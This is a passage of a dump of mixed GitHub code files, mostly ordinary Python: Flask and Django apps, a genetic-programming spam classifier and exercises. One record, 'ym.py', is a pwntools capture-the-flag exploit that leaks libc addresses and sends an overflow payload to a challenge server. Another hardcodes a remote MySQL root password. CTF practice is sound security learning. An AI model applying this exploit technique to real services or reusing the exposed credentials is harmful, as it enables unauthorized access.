form_results.items():\n print('This is k', k)\n print('This is v', v)\n if v == 'y':\n x_cols.remove(k)\n y_col = k\n print('This is y_col', y_col)\n print('Now here is cols_to_keep', cols_to_keep)\n print('Now here is x_cols', x_cols)\n # print('This is again y_col', y_col)\n cols_to_drop = set(all_cols) - set(cols_to_keep)\n new_df = df.drop(cols_to_drop, axis=1)\n print('Here is new_df', new_df)\n df_X = new_df.drop(y_col, axis=1)\n head = print_head(new_df)\n new_df.to_csv('../data/df_reduced_cols.csv')\n columns = list(new_df.columns)\n X = df_X\n y = df[y_col]\n ols_results = ols_tm(X.astype(float), y)\n ols_summary = Markup(ols_results)\n\n return flask.render_template(\n 'cols4.html',\n head = head,\n columns = columns,\n ols_summary = ols_summary\n )\n\n # return flask.render_template(\n # 'cols2.html'\n # )\n\n@app.route('/rename_cols', methods=[\"POST\"])\ndef rename_cols():\n return flask.render_template(\"hi there!\")\n\n\n@app.route('/ols', methods=[\"POST\"])\ndef ols():\n pass\n\n@app.route('/process', methods=['POST', 'GET'])\ndef process():\n\n if request.method=='POST':\n\n df = pd.read_csv('../data/df_reduced_cols.csv')\n df.reset_index(drop=True)\n all_cols = list(df.columns)\n print('Here is all_cols:', all_cols)\n # for col in cols:\n form_results = request.form\n print('request.form: ', request.form)\n cols_to_keep = list(form_results.keys())\n x_cols = cols_to_keep.copy()\n print('Here is cols_to_keep:', cols_to_keep)\n print('Here is x_cols: ', x_cols)\n for k, v in form_results.items():\n print('k:', k)\n print('v:', v)\n df[k] = v\n\n print('df.columns', df.columns)\n head = print_head(df)\n df.to_csv('../data/df_reduced_cols.csv')\n columns = list(df.columns)\n\n return jsonify({'test' : columns})\n\n elif request.method=='GET':\n return \"OK this is a GET method\"\n else:\n return(\"ok\")\n\nif __name__ == \"__main__\":\n Bootstrap(app)\n app.run(host='0.0.0.0', port=8080, debug=True, use_reloader=False)\n","repo_name":"howardvickers/no-code-ml","sub_path":"src/old_app.py","file_name":"old_app.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18982952017","text":"from django.db import models\nfrom ajaximage.fields import AjaxImageField\nfrom common.models import MultiImageMeta, Spec\n\n\nclass CommercialProjectGallerySlide(models.Model, metaclass=MultiImageMeta):\n \"\"\"\n Слайд галереи коммерческого проекта\n \"\"\"\n\n WIDTH = 1440\n HEIGHT = 595\n\n title = models.CharField(verbose_name=\"Заголовок\", max_length=100, null=True, blank=True)\n subtitle = models.CharField(verbose_name=\"Подзаголовок\", max_length=300, null=True, blank=True)\n video = models.FileField(verbose_name=\"Видео (деск.)\", blank=True, upload_to=\"cpp/pgs/v\")\n video_mobile = models.FileField(verbose_name=\"Видео (моб.)\", blank=True, upload_to=\"cpp/pgs/vm\")\n\n image = AjaxImageField(\n verbose_name=\"Изображение\",\n upload_to=\"p/gallery\",\n blank=True,\n null=True,\n help_text=f\"шир. - {WIDTH}, выс. - {HEIGHT}\",\n )\n\n commercial_project_page = models.ForeignKey(\n verbose_name=\"Страница коммерческого проекта\",\n to=\"commercial_project_page.CommercialProjectPage\",\n on_delete=models.CASCADE,\n related_name=\"gallery_slides\",\n )\n\n order = models.PositiveSmallIntegerField(verbose_name=\"Порядок\", default=0, db_index=True)\n\n image_map = {\n \"image_display\": Spec(source=\"image\", width=WIDTH, height=HEIGHT),\n \"image_preview\": Spec(source=\"image\", width=WIDTH, height=HEIGHT, blur=True),\n }\n\n class Meta:\n verbose_name = \"Слайд галереи\"\n verbose_name_plural = \"Слайды галереи\"\n ordering = (\"order\",)\n\n def __str__(self):\n return f\"{self._meta.verbose_name} #{self.order}\"\n","repo_name":"r2r2/strana_backend","sub_path":"backend/commercial_project_page/models/commercial_project_gallery_slide.py","file_name":"commercial_project_gallery_slide.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14374484177","text":"from django import forms\nfrom ckeditor.fields import RichTextFormField\n\nclass FormularioComprarEntradas(forms.Form):\n OPCIONES_METODO_PAGO = [('efectivo', 'Efectivo'), ('mercadopago', 'MercadoPago')]\n\n nombre = forms.CharField(max_length=20, widget=forms.TextInput(attrs={'placeholder': 'Ingrese su nombre'}))\n mail = forms.CharField(max_length=40, widget=forms.TextInput(attrs={'placeholder': 'Ingrese su mail'}))\n cant_entradas = forms.IntegerField()\n metodo_pago = forms.ChoiceField(choices=OPCIONES_METODO_PAGO)\n opinion = forms.Media()\n imagen = forms.ImageField()\n\nclass ModificarCompra(forms.Form):\n nombre = forms.CharField(max_length=20,widget=forms.TextInput(attrs={'placeholder': 'Inrese su nombre'}))\n mail = forms.CharField(max_length=40,widget=forms.TextInput(attrs={'placeholder': 'Inrese su mail'}))\n cant_entradas = forms.IntegerField()\n opinion = forms.Media()\n","repo_name":"MateoLarrosa/Janerfest-entregaCoder3","sub_path":"entradas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21263746527","text":"numtxt = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze',\n 'doze', 'treze', 'catorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\n\ncores = dict(reset='\\033[m',\n red='\\033[31m',\n blue='\\033[34m',\n negrito='\\033[1m',\n neg_ita='\\033[1;3m'\n )\n\nwhile True:\n num = int(input('Digite um número entre 0 e 20: ').strip())\n while True:\n if 0 <= num <= 20:\n break\n num = int(input('Valor inválido! Digite um número entre 0 e 20: '))\n\n print(f'\\n{cores[\"negrito\"]}O número {num} por extenso é {cores[\"neg_ita\"]}{numtxt[num]}{cores[\"reset\"]}.')\n\n esc = input('\\nQuer continuar? (Sim / Não) ').strip().upper()[0]\n\n while True:\n if esc not in 'SN':\n print('')\n esc = input(f'{cores[\"red\"]}Valores incorretos! Digite novamente (Sim / Não): {cores[\"reset\"]}').strip().upper()[0]\n else:\n break\n print('')\n\n if esc == 'N':\n break\n\nprint('--- Fim da execução ---')\n","repo_name":"Henrique-Sc/CursoemVideo-Python","sub_path":"Exercicios/ex072.py","file_name":"ex072.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38738642883","text":"import warnings\nwarnings.simplefilter(\"ignore\")\n\nimport operator\nimport itertools\n\nfrom deap import algorithms\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import gp\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\n# defined a new primitive set for strongly typed GP\npset = gp.PrimitiveSetTyped(\"MAIN\", itertools.repeat(float, 57), bool, \"IN\")\n# określamy zbór prymitywów\n# boolean operators\npset.addPrimitive(operator.and_, [bool, bool], bool)\npset.addPrimitive(operator.or_, [bool, bool], bool)\npset.addPrimitive(operator.not_, [bool], bool)\n\npset.addPrimitive(operator.add, [float, float], float)\npset.addPrimitive(operator.sub, [float, float], float)\npset.addPrimitive(operator.mul, [float, float], float)\n\n# logic operators\n# Define a new if-then-else function\n#tu sami definiujemy prymityw\ndef if_then_else(input, output1, output2):\n if input:\n return output1\n else:\n return output2\n\npset.addPrimitive(operator.lt, [float, float], bool)\npset.addPrimitive(operator.eq, [float, float], bool)\npset.addPrimitive(if_then_else, [bool, float, float], float)\n\npset.addTerminal(False, bool)\npset.addTerminal(True, bool)\n\n# solution encoding\n# jaka bedzie reprezentacja osobnika, jak będzie enkodowany osobnik\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", gp.PrimitiveTree, fitness=creator.FitnessMax)\n# to co podajemy tej fcji to odpowiednik wskaźnika na funkcję w c (gp.PrimitiveTree)\n\n#fit function\n# określamy funkcję jakosci, ważny będzie dla nas jak dany osobnik rozpoznaje pocztę\n# funkcja przyjmuje jako argument osobnika\n\ndef evalSpambase(individual):\n # Transform the tree expression in a callable function\n func = toolbox.compile(expr=individual)\n #powyżej osobnik z reprezentacji drzewiastej jest przekształcany na kod python\n #funkcja reprezentuje nasze drzewko\n result = sum(bool(func(*mail)) is bool(target) for mail, target in zip(emails_train, targets_train))\n #czy wartość boolowska zwrócona przez drzewko jest taka jak target\n #powstaje lista wypełniona wartościami true lub folse w zależnosci od tego czy są takie same czy różne\n #ilość poprawnychh i niepoprawnych jest zliczana\n return result,\n\n# GP parameters\n#określamy parametry algorytmu\ntoolbox = base.Toolbox()\n\ntoolbox.register(\"expr\", gp.genHalfAndHalf, pset=pset, min_=1, max_=5)#zbiór prymitywów, minimalna głebokość, maksymalna głębokość\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.expr)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\ntoolbox.register(\"compile\", gp.compile, pset=pset)\n\ntoolbox.register(\"evaluate\", evalSpambase)#podpięcie naszej funkcji oceniajacej\n\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\ntoolbox.register(\"mate\", gp.cxOnePoint)\ntoolbox.register(\"expr_mut\", gp.genFull, min_=0, max_=2)\ntoolbox.register(\"mutate\", gp.mutUniform, expr=toolbox.expr_mut, pset=pset)\n\nimport multiprocessing\n\npool = multiprocessing.Pool()\ntoolbox.register(\"map\", pool.map)\n\n# set population size\npop = toolbox.population(n=80)\nhof = tools.HallOfFame(5)#dodatkowa pamięc w której zapisujemy jaki był najlepszy osobnik do tej pory\n\nhistory = tools.Statistics(lambda ind: ind.fitness.values)#zbieramy do historii statystykę populacji\nhistory.register(\"max_fit\", np.max)#referencje do metod, tutaj moglibyśmy podpiąć swoje funkcje\nhistory.register(\"mean_fit\", np.mean)\n\n#prawdopodobieństwo krzyżowania, mutacj, ilosć iteracji\npop, history = algorithms.eaSimple(pop, toolbox, 0.2, 0.1, 200, history, halloffame=hof)\n#jeśleli w max_fit i mean_fit dostajemy taki sam wynik to znaczy że jeden osobnik zdominował całą populację\nprint(\"Learned spam detection rule: \", hof[-1])\n\n#jednocześnie:\n#ekstrakcja cech - wzięcie pod uwagę pewnego podzbioru cech\n#nieliniowa transformacja cech\n#zbudowany klasyfikator\n\nplt.figure(figsize=(11, 4))\nplots = plt.plot(history.select('max_fit'),'c-', history.select('mean_fit'), 'b-')\nplt.legend(plots, ('Max fitness', 'Mean fitness'), frameon=True)\nplt.ylabel('Fitness'); plt.xlabel('Iterations'); plt.grid()\n#rysujemy proces ewolucyjny","repo_name":"mijapa/FuzzyProject","sub_path":"fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4293800826","text":"from django import forms\nfrom .models import Product\n\n# 問 2-3-1 RegisterForm クラスを作成しましょう。引数には ModelForm を指定しましょう。\nclass RegisterForm(forms.ModelForm):\n # 問 2-3-2 Meta クラスを作成しましょう。\n class Meta:\n # 問 2-3-2-1 model には Product テーブルを指定しましょう。\n model = Product\n # 問 2-3-2-2 fields には product_name、price、product_detail、category、img を指定しましょう。\n fields = ('product_name','price','product_detail','category','img')\n # 問 2-3-2-3 labels には下記を指定しましょう。\n labels = {\n 'product_name':'商品名',\n 'price':'価格',\n 'product_detail':'商品詳細',\n 'category':'カテゴリー',\n 'img':'商品画像',\n }\n # 問 2-3-3 init 関数を作成しましょう。\n def __init__(self,*args,**kargs):\n # 問 2-3-3-1 super().__init__() として、*args と **kwargs を継承しましょう。\n super().__init__(*args,**kargs)\n # 問 2-3-3-2 self.label_suffix に '' を指定して、ラベル名の横にあるコロンを非表示にしましょう。\n self.label_suffix = ''\n # 問 2-3-3-3 for 文で self.fields.values() を回しましょう。\n for field in self.fields.values():\n # 問 2-3-3-4 それぞれの field の placeholder と class を変更しましょう。placeholder には field.label、class には form-control を指定しましょう。\n field.widget.attrs['placeholder'] = field.label\n field.widget.attrs['class'] = 'form-control'\n# 問 4-4-1 SearchProductForm クラスを作成しましょう。引数には ModelForm を指定しましょう。\n\n # 問 4-4-2 Meta クラスを作成しましょう。\n\n # 問 4-4-3 model に Product、fields に category、labels に {'category':'カテゴリー'} を指定しましょう。\n\n # 問 4-4-4 init 関数を作成しましょう。\n\n # 問 4-4-5 super().__init__() として、*args と **kwargs を継承しましょう。\n\n # 問 4-4-6 self.label_suffix を 空で指定しましょう。\n\n # 問 4-4-7 self.fields.values() を field 変数として for 文で回しましょう。\n\n # 問 4-4-8 class に form-control を指定しましょう。\n\n # 問 4-4-9 field.required に False を指定しましょう。\n","repo_name":"Philomoon/kinocollege_friends","sub_path":"web_app10/ec_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14004792190","text":"import os\nimport pymysql\nimport xlrd\n\ndef judgec(lst):\n if lst[2] - lst[1] == 1 and lst[1] - lst[0] == 0:\n return True\n return False\n\ndef judgel(lst):\n for i in list(range(len(lst)))[:-2]:\n isc = judgec(lst[i:i+3])\n if isc:\n return True\n return False\n\n_path = r'xlsxs/慢支.xlsx'\n\nhost = '115.159.193.122'\nport = 3306\nusername = 'root'\npassword = 'hkxx@206'\ndb = 'cola'\ncharset = 'utf8'\n\nconn = pymysql.connect(host=host,\n port=port,\n user=username,\n password=password,\n db=db,\n charset=charset,\n cursorclass=pymysql.cursors.DictCursor)\n\ncursor = conn.cursor()\n\ninsert_sql = 'insert into diseases(disease, question, answer) values(%s, %s, %s)'\n\nwbook = xlrd.open_workbook(_path)\nsheetname = wbook.sheet_names()[0]\nsheetcont = wbook.sheet_by_name(sheetname)\n\nindex_0 = [0]\nindex_s = []\ncount = 0\nfor i in list(range(sheetcont.nrows))[1:]:\n this_line = sheetcont.row_values(i)\n line_0 = this_line[0]\n if line_0.strip() == '':\n index_0.append(0)\n else:\n index_0.append(1)\n index_s.append(i)\n count += 1\n# print(count)\n# print(index_0)\n# print(len(index_0))\n# print(len(index_s))\n# print(index_s)\n# print(judgel(index_s))\nindex_s.append(sheetcont.nrows)\n# print(len(index_s))\n# print(sheetcont.nrows)\n\nfor i in list(range(len(index_s)))[1:-1]:\n cno = 0\n ind = 0\n data = []\n data.append('慢支')\n\n # print(i, end=' ')\n if i < len(index_s) - 1:\n if index_s[i + 1] - index_s[i] == 1:\n continue\n\n if index_s[i] - index_s[i - 1] == 1:\n ind = i - 1\n cno = 2\n else:\n ind = i\n cno = 1\n\n # print('ind :', ind)\n this_question = ''\n # print(1, ind, index_s[ind], index_s[ind] + cno, end=' ')\n for j in list(range(index_s[ind], index_s[ind] + cno)):\n this_line = sheetcont.row_values(j)\n cont = this_line[0].strip().replace('\\n', '')\n cont = cont.replace(' ', '')\n this_question += cont\n data.append(this_question)\n # print(j)\n\n this_answer = ''\n # print(2, ind, len(index_s), index_s[ind], index_s[ind + 1], sheetcont.nrows, end=' ')\n for j in list(range(index_s[ind], index_s[ind + 1])):\n this_line = sheetcont.row_values(j)\n cont = this_line[1].strip().replace('\\n', '')\n cont = cont.replace(' ', '')\n this_answer += cont\n data.append(this_answer)\n # print(j)\n\n # print(i, end=' ')\n # print(data)\n\n cursor.execute(insert_sql, data)\n print('插入第', repr(cursor.lastrowid), '条数据', 'Done!!!!!!!!!')\n conn.commit()\n\n\n\n","repo_name":"waspart/python","sub_path":"excelprocess/diseaseinsert2.py","file_name":"diseaseinsert2.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13546537151","text":"#! /usr/bin/python\n#Author: Tony Allard\n#Date: 07 October 2016\n#Description: A Python script for extracting the number of dead ends encountered by the planner.\n#Extracts data to CSV file, including averages.\n\nimport sys\nimport os\nimport argparse\nimport re\nimport AnalysisCommon\n\nDEAD_END_COUNT_DELIM = \"#; Search encountered\"\nDEAD_END_COUNT_TERM_DELIM = \" dead ends\"\nEHC_SEARCH_STARTING = \"Initial heuristic = \"\nBFS_SEARCH_STARTING = \"Resorting to best-first search\"\nINITIAL_STATE_DEADENDS = \"#; Initial State - dead ends encountered:\"\n\ndef extractDeadEnds(log):\n\tfor line in log:\n\t\tif DEAD_END_COUNT_DELIM in line:\n\t\t\tdeadEndCount = re.findall(r'\\d+', line)\n\t\t\treturn int(deadEndCount[0])\n\treturn None\n\ndef extractInitialStateDeadEnds(log):\n\tfor line in log:\n\t\tif INITIAL_STATE_DEADENDS in line:\n\t\t\tvalue = line[line.index(INITIAL_STATE_DEADENDS) + len(INITIAL_STATE_DEADENDS):]\n\t\t\tstates = re.findall(r'\\d+', value)\n\t\t\tif len(states) != 1:\n\t\t\t\traise RuntimeError(\"Error! Multiple dead end counts found: %s\"%states)\n\t\t\treturn int(states[0])\n\treturn None\n\ndef extractDeadEndsManually(logBuffer):\n\tstartIdx = -1\n\ti = 0\n\tfor line in logBuffer:\n\t\tif line.find(AnalysisCommon.SEARCH_BEGIN_DELIM) >= 0:\n\t\t\tstartIdx = i\n\t\t\tbreak\n\t\ti+=1\n\tif startIdx == -1:\n\t\treturn None\n\n\tdeadEnds = 0\n\tfor x in range(startIdx+1, len(logBuffer)):\n\t\tdeadEnds += AnalysisCommon.filterBranchString(logBuffer[x]).count('d')\n\t\tif any(substring in logBuffer[x] for substring in AnalysisCommon.TERMINATE_FLAGS):\n\t\t\tbreak\t\n\treturn int(deadEnds)\n\ndef main(args):\n\tparser = argparse.ArgumentParser(description='A Python script for extracting the number of dead ends encountered by the planner.')\n\tparser.add_argument('path',\n\t metavar='/path/to/planner/logs/',\n\t\t\t\t\t\ttype=str,\n\t\t help='the location of the logs for a specific planner')\n\targs = parser.parse_args()\n\t\t \n\tif not os.path.isdir(args.path):\n\t\tprint(\"Error: %s is not a valid directory\"%args.path)\n\t\tsys.exit(-1)\n\t\n\tinputPath = args.path\n\n\tlogStructure = AnalysisCommon.getLogStructure(inputPath)\n\n\tfor planner in logStructure:\n\t\tprint (planner)\n\t\tif planner == \"lpg-td\":\n\t\t\tcontinue\n\t\tfor problemDomain in logStructure[planner]:\n\t\t\tlogPath = logStructure[planner][problemDomain]\n\n\t\t\tdeadEnds = 0\n\t\t\tinitialState_deadEnds = 0\n\t\t\tprobsConsidered = 0 \n\n\t\t\tfor filename in os.listdir(logPath):\n\t\t\t\tfullQualified = os.path.join(logPath, filename)\n\t\t\t\tbuffer = AnalysisCommon.bufferCompressedFile(fullQualified)\n\t\t\t\tif buffer == -1:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tif not AnalysisCommon.isProblemLog(filename, buffer):\n\t\t\t\t\tcontinue\n\t\t\t\ttmpDeadEnds = extractDeadEndsManually(buffer)\n\t\t\t\tif tmpDeadEnds is not None:\n\t\t\t\t\tdeadEnds += tmpDeadEnds\n\t\t\t\ttmpInitStateDeadEnds = extractInitialStateDeadEnds(buffer)\n\t\t\t\tif tmpInitStateDeadEnds is not None:\n\t\t\t\t\tinitialState_deadEnds += tmpInitStateDeadEnds\n\t\t\t\t\n\t\t\t\tprobsConsidered += 1\n\t\t\t\t\n\t\t\tprint (\"\\t%s\"%problemDomain)\n\t\t\tprint (\"\\t\\tAvg Dead Ends: %f\"%(deadEnds/probsConsidered))\n\t\t\tprint (\"\\t\\tAvg Initial State Dead Ends: %f\"%(initialState_deadEnds/probsConsidered))\n\n#Run Main Function\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"tonyallard/CEIScripts","sub_path":"problem-analysis/ExtractDeadEnds.py","file_name":"ExtractDeadEnds.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29560249713","text":"import re\nfrom pwn import * # type: ignore\nfrom time import sleep\n\ncontext(arch=\"amd64\", os=\"linux\")\n# context.log_level = \"DEBUG\"\n\nRECV_DELAY = 1\nRECV_SIZE = 32768\n\nlibc = ELF(\"libc.so.6\")\n\n# readelf -Ws libc.so.6 | grep ' puts\\W'\n\n\ndef parse_steps(fname: str):\n with open(fname, \"r\") as file:\n fc = file.read().split(\"\\n\")\n\n # filter out comment lines\n fc = filter(lambda x: len(x) != 0 and x[0] != \"#\", fc)\n fc = \"\\n\".join(fc)\n\n # plus signs = inline newlines\n return fc.replace(\"+\", \"\\n\")\n\n\nr = remote(\"chal.pctf.competitivecyber.club\", 4444)\n\n\ndef recv():\n sleep(RECV_DELAY)\n return r.recv(RECV_SIZE).decode()\n\n\n# get balance to underflow\ntip_spam_txt = parse_steps(\"1_spam_tips.txt\")\nr.send(bytes(tip_spam_txt, \"utf-8\"))\nrecv()\n\n# buy the book\nr.send(b\"2\\n3\\ny\\n\")\nsleep(RECV_DELAY)\nres = recv()\n\n# get address of puts\npattern = r\"0x[0-9a-f]+\"\nputs_addr = re.findall(pattern, res)[0]\nprint(f\"Address of `puts`: {puts_addr}\")\n\n# puts is 0x80ed0 offset from libc base\nlibc_addr = int(puts_addr, 16) - 0x80ED0\nlibc.address = libc_addr\nprint(f\"Address of libc base: {hex(libc_addr)}\")\n\nsys_addr = libc_addr + 0x050D60\nprint(f\"Address of `system`: {hex(sys_addr)}\")\n\nr.send(b\"1\\ny\\n\")\nr.send(b\"a\" * 60)\nrecv()\n\nr.send(b\"\\n3\\n\\n\")\nprint(recv())\n\nr.interactive()\n\nr.close()\n","repo_name":"zuna06/patriot-ctf","sub_path":"bookshelf/ym.py","file_name":"ym.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29954030746","text":"with open('Input.txt', mode='r', encoding='utf-8') as file:\r\n input = file.read().split('\\n')\r\n\r\ndef create_binary_str(method):\r\n\r\n binary_str = ''\r\n\r\n for i in range(len(input[0])):\r\n zeros = 0\r\n ones = 0\r\n for value in input:\r\n if value[i] == '0':\r\n zeros += 1\r\n elif value[i] == '1':\r\n ones += 1\r\n if (zeros > ones and method == 'mstCmn') or (ones > zeros and method == 'lstCmn'):\r\n binary_str = binary_str + '0'\r\n elif (ones > zeros and method == 'mstCmn') or (zeros > ones and method == 'lstCmn'):\r\n binary_str = binary_str + '1'\r\n\r\n return int(binary_str, 2)\r\n\r\ngamma_rate = create_binary_str('mstCmn')\r\nepsilon_rate = create_binary_str('lstCmn')\r\n\r\nprint(gamma_rate * epsilon_rate)\r\n","repo_name":"Ross117/Advent-of-Code-2021","sub_path":"AoC Day 3 Part 1.py","file_name":"AoC Day 3 Part 1.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21496216133","text":"n = int(input())\nmin = n + 1\ncount = 1\npos = [0 for _ in range(min)]\nnums = list(map(int, input().split()))\nfor i, num in enumerate(nums):\n pos[num] = i\nfor i in range(n):\n if pos[i+1] < pos[i]:\n count += 1\nprint(count)\n","repo_name":"rv02/YeetCode","sub_path":"CSES/sorting_and_searching/collecting_numbers.py","file_name":"collecting_numbers.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3546852287","text":"import math\n\ndef is_prime_number(x):\n # 2부터 x의 제곱근까지의 모든 수를 확인하며\n for i in range(2, int(math.sqrt(x)) + 1):\n # x가 해당 수로 나누어떨어진다면\n if x % i == 0:\n return False # 소수가 아님\n return True # 소수임\n\nn = int(input())\ndata = list(map(int, input().split()))\nans = []\n\nfor i in range(1, n+1):\n if is_prime_number(i) and i != 1:\n ans.append(data[i-1])\n\nprint(sum(ans))\n\n","repo_name":"wjddn1029/AlgorithmStudy","sub_path":"연습_D/career/practice_test6.py","file_name":"practice_test6.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20920061365","text":"# -*- coding: utf-8 -*-\n# gui/liststyle.py\n\nimport logging\nfrom QtCore import QFileInfo\nfrom QtGui import QPalette\nfrom QtWidgets import QWidget\n\n# required for svg graphics support\nfrom .qt import QtSvg, QtXml, pluginDirs\nfrom ..main import makeAbsolutePath\n\ndef makeAlternatingRowColorsTransparent(widget):\n palette = widget.palette()\n color = palette.color(QPalette.AlternateBase)\n color.setAlphaF(0.4)\n palette.setColor(QPalette.AlternateBase, color)\n widget.setPalette(palette)\n\ndef setBackgroundStyleSheet(widget, imgpath):\n assert isinstance(widget, QWidget)\n makeAlternatingRowColorsTransparent(widget.listWidget)\n stylesheet = \"\"\"\n #listWidget {{\n background-image: url({path});\n background-repeat: no-repeat;\n background-position: center center;\n background-attachment: fixed;\n background-color: {bgcol};\n }}\n \"\"\"\n # convert path to qt style formatting (separators, ...)\n imgpath = QFileInfo(makeAbsolutePath(imgpath)).absoluteFilePath()\n # also set background color of image to same used in GUI (covers dark mode)\n bgcol = widget.listWidget.palette().color(QPalette.Base)\n widget.setStyleSheet(stylesheet.format(path=imgpath, bgcol=bgcol.name()))\n\n# vim: set ts=4 sts=4 sw=4 tw=0:\n","repo_name":"BAMresearch/McDLS","sub_path":"src/mcsas/gui/liststyle.py","file_name":"liststyle.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74667745753","text":"import smtk\nimport smtk.attribute\nimport smtk.testing\nimport smtk.view\n\n\nclass testModifyViewComponents(smtk.testing.TestCase):\n\n def setUp(self):\n self.attRsc = smtk.attribute.Resource.create()\n\n def testAddViewComponents(self):\n # Create an empty view\n testView = smtk.view.View.New('Instanced', 'testView')\n self.attRsc.addView(testView)\n # Test addChild() and details()\n attComp = testView.details().addChild(\n 'InstancedAttributes').addChild('Att')\n # Make sure attcomp and SameAttComp is a reference\n SameAttComp = attComp.setAttribute('Name', 'Foo')\n SameAttComp.setAttribute('Title', 'Bar')\n instanceIndex = testView.details().findChild('InstancedAttributes')\n if instanceIndex == -1:\n raise Exception('smtk.view.details() failed!')\n attIndex = testView.details().child(instanceIndex).findChild('Att')\n if attIndex == -1:\n raise Exception('smtk.view.component.addChild() failed!')\n # Grab the component again\n attCompAgain = testView.details().child(instanceIndex).child(attIndex)\n success = attCompAgain.attribute('Name')\n if not success:\n raise Exception('smtk.view.component.addChild() failed!')\n success = attCompAgain.attribute('Title')\n if not success:\n raise Exception('smtk.view.component.setAttribute() failed!')\n # Test unsetAttribute\n attCompJr = attComp.unsetAttribute('Title')\n Found = attComp.attribute('Title')\n if Found:\n raise Exception('smtk.view.component.unsetAttribute() failed!')\n attCompJr.setAttribute('Title', 'Foo')\n success = attComp.attribute('Title')\n if not success:\n raise Exception('smtk.view.component.unsetAttribute() failed!')\n\n # Test Child()\n attCompAgain.setAttribute('Type', 'Baz')\n attCompFinal = testView.details().child(instanceIndex).child(attIndex)\n success = attCompFinal.attribute('Type')\n if not success:\n raise Exception('smtk.view.component.Child() failed!')\n\n # Print all the attributes. Note pybind drops its const-ness so we do\n # not want it to return the attributes map by reference\n compAtts = attComp.attributes()\n print('Attributes in the component:')\n for att, value in compAtts.items():\n print('Attribute: {}, Value: {}'.format(att, value))\n\n\nif __name__ == '__main__':\n smtk.testing.process_arguments()\n smtk.testing.main()\n","repo_name":"Kitware/SMTK","sub_path":"smtk/view/testing/python/modifyViewComponents.py","file_name":"modifyViewComponents.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"31230651035","text":"# -*- coding: utf-8 -*-\n\nfrom typing import List, Dict\n\n\nclass StatDescriptionModel(object):\n def __init__(self, tag: str,\n name: Dict[str, str], description: Dict[str, str],\n upgradeable: bool, aptitudes: List[str]):\n self.tag = tag\n self.name = name\n self.description = description\n self.upgradeable = upgradeable\n self.aptitudes = aptitudes\n\n @classmethod\n def from_json(cls, data):\n return cls(**data)\n","repo_name":"KCherkasov/squat-toolbox","sub_path":"charlist/flyweights/models/stat_description_model.py","file_name":"stat_description_model.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36074116994","text":"from __future__ import annotations\n\nimport asyncio\nimport inspect\nimport time\nimport uuid\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Any, Awaitable, Callable, Dict, Iterable, Iterator, List, Optional, Union\n\nfrom fastapi import Request\nfrom fastapi.responses import Response\nfrom fastapi.templating import Jinja2Templates\n\nfrom nicegui import json\n\nfrom . import background_tasks, binding, core, helpers, outbox\nfrom .awaitable_response import AwaitableResponse\nfrom .dependencies import generate_resources\nfrom .element import Element\nfrom .favicon import get_favicon_url\nfrom .logging import log\nfrom .version import __version__\n\nif TYPE_CHECKING:\n from .page import page\n\ntemplates = Jinja2Templates(Path(__file__).parent / 'templates')\n\n\nclass Client:\n page_routes: Dict[Callable[..., Any], str] = {}\n \"\"\"Maps page builders to their routes.\"\"\"\n\n instances: Dict[str, Client] = {}\n \"\"\"Maps client IDs to clients.\"\"\"\n\n auto_index_client: Client\n \"\"\"The client that is used to render the auto-index page.\"\"\"\n\n def __init__(self, page: page, *, shared: bool = False) -> None:\n self.id = str(uuid.uuid4())\n self.created = time.time()\n self.instances[self.id] = self\n\n self.elements: Dict[int, Element] = {}\n self.next_element_id: int = 0\n self.is_waiting_for_connection: bool = False\n self.is_waiting_for_disconnect: bool = False\n 